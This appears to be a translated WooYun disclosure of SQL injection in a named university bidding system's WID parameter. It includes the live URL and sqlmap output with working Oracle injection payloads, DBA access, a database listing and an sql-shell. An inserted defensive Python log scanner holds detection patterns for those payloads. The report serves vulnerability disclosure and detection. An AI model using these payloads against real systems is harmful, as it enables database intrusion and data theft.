WooYun (WooYun.org) historical vulnerability lookup --- http://wy.zone.ci/
WooYun Drops articles, online viewing -------- http://drop.zone.ci/
2015-12-07: Details reported to the vendor, awaiting vendor handling
2015-12-07: Vendor confirmed; details disclosed to the vendor only
2015-12-17: Details disclosed to core white hats and relevant domain experts
2015-12-27: Details disclosed to regular white hats
2016-01-06: Details disclosed to intern white hats
2016-01-21: Details disclosed to the public
As the title says.
I saw that this site had vulnerabilities listed, but a keyword search turned up nothing, so it probably has not been submitted before.
0x01 Vulnerability location
East China Normal University Equipment Bidding System
0x02 Vulnerability details
http://jingjia.ecnu.edu.cn/sggl/wsjj/ggztDetails.jsp?WID=1
0x03 Exploitation method
sqlmap
0x04 Proof of vulnerability
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: WID
    Type: error-based
    Title: Oracle AND error-based - WHERE or HAVING clause (UTL_INADDR.GET_HOST_ADDRESS)
    Payload: WID=1' AND 1357=UTL_INADDR.GET_HOST_ADDRESS(CHR(113)||CHR(109)||CHR(97)||CHR(107)||CHR(113)||(SELECT (CASE WHEN (1357=1357) THEN 1 ELSE 0 END) FROM DUAL)||CHR(113)||CHR(118)||CHR(115)||CHR(110)||CHR(113)) AND 'VMng'='VMng

    Type: UNION query
    Title: Generic UNION query (NULL) - 3 columns
    Payload: WID=1' UNION ALL SELECT NULL,CHR(113)||CHR(109)||CHR(97)||CHR(107)||CHR(113)||CHR(103)||CHR(68)||CHR(81)||CHR(71)||CHR(97)||CHR(73)||CHR(82)||CHR(106)||CHR(103)||CHR(81)||CHR(113)||CHR(118)||CHR(115)||CHR(110)||CHR(113),NULL FROM DUAL--

    Type: AND/OR time-based blind
    Title: Oracle AND time-based blind
    Payload: WID=1' AND 2452=DBMS_PIPE.RECEIVE_MESSAGE(CHR(109)||CHR(116)||CHR(114)||CHR(98),5) AND 'FeZB'='FeZB
---
[13:47:01] [INFO] the back-end DBMS is Oracle
web application technology: JSP
back-end DBMS: Oracle
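As an added example that is not part of the original report, a defender-side check for the kind of traffic shown in the sqlmap output above: it parses web access log lines, decodes the query string, requires WID to be a plain integer (the URL uses it as a row id) and flags the Oracle-specific signatures visible in the payloads (UTL_INADDR.GET_HOST_ADDRESS, DBMS_PIPE.RECEIVE_MESSAGE, CHR()||CHR() chains, UNION ... FROM DUAL). The log format, client IP and sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus, urlsplit

# Signatures taken from the Oracle-specific sqlmap payloads shown in the report.
ORACLE_SQLI_PATTERNS = [
    ("oracle-error-based", re.compile(r"UTL_INADDR\.GET_HOST_ADDRESS", re.I)),
    ("oracle-time-based", re.compile(r"DBMS_PIPE\.RECEIVE_MESSAGE", re.I)),
    ("oracle-union-dual", re.compile(r"UNION\s+ALL\s+SELECT\b.*\bFROM\s+DUAL", re.I | re.S)),
    ("chr-concat", re.compile(r"CHR\(\d+\)\s*\|\|\s*CHR\(\d+\)", re.I)),
]
# WID is a numeric row id in the vulnerable URL, so anything else is suspicious.
WID_OK = re.compile(r"^\d{1,10}$")

def inspect_request(target):
    """Return (label, parameter) findings for one request target (path?query)."""
    findings = []
    params = parse_qs(urlsplit(target).query, keep_blank_values=True)
    for name, values in params.items():
        for raw in values:
            value = unquote_plus(raw)  # second decode catches double-encoded payloads
            if name == "WID" and not WID_OK.match(value):
                findings.append(("WID-not-integer", name))
            for label, pattern in ORACLE_SQLI_PATTERNS:
                if pattern.search(value):
                    findings.append((label, name))
    return findings

# Assumed Apache/Tomcat-style access log line: ip ident user [time] "METHOD target PROTO" status size
LOG_LINE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) \S+" (\d{3}) \S+')

def scan_access_log(text):
    """Return (client_ip, target, findings) for every request that trips a check."""
    hits = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        ip, _ts, _method, target, _status = m.groups()
        findings = inspect_request(target)
        if findings:
            hits.append((ip, target, findings))
    return hits

# Constructed sample log: one normal request, then two trimmed payloads from the report.
SAMPLE_LOG = """\
203.0.113.10 - - [07/Dec/2015:13:44:01 +0800] "GET /sggl/wsjj/ggztDetails.jsp?WID=1 HTTP/1.1" 200 5120
203.0.113.10 - - [07/Dec/2015:13:44:57 +0800] "GET /sggl/wsjj/ggztDetails.jsp?WID=1%27%20AND%201357%3DUTL_INADDR.GET_HOST_ADDRESS(CHR(113)%7C%7CCHR(109))%20AND%20%27VMng%27%3D%27VMng HTTP/1.1" 500 812
203.0.113.10 - - [07/Dec/2015:13:47:01 +0800] "GET /sggl/wsjj/ggztDetails.jsp?WID=1%27%20AND%202452%3DDBMS_PIPE.RECEIVE_MESSAGE(CHR(109)%7C%7CCHR(116),5)%20AND%20%27FeZB%27%3D%27FeZB HTTP/1.1" 200 5120
"""
```

Running `scan_access_log(SAMPLE_LOG)` returns the two injected requests with their labels and leaves the normal `WID=1` request unflagged; the same WID check is the input validation the JSP page itself should enforce before building any query.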
Found that the database user has DBA privileges
[13:44:57] [INFO] testing if current user is DBA
[13:44:57] [WARNING] reflective value(s) found and filtering out
current user is DBA: True
Full list of databases
available databases [24]:
[*] APEX_030200
[*] APPQOSSYS
[*] CTXSYS
[*] DBSNMP
[*] EXFSYS
[*] FLOWS_FILES
[*] HSD_ZJK
[*] MDSYS
[*] OLAPSYS
[*] ORDDATA
[*] ORDSYS
[*] OUTLN
[*] OWBSYS
[*] SCOTT
[*] SYS
[*] SYSMAN
[*] SYSTEM
[*] WMSYS
[*] XDB
[*] ZC
[*] ZC20110430
[*] ZC20140731
[*] ZC_TEST
[*] ZCTEST
Table information
Database: ZC [320 tables]
Obtained an sql-shell
I think it is time to replace this system.
Severity: High
Vulnerability Rank: 10
Confirmation time: 2015-12-07 14:07
Notified the second-level unit to handle it.
None yet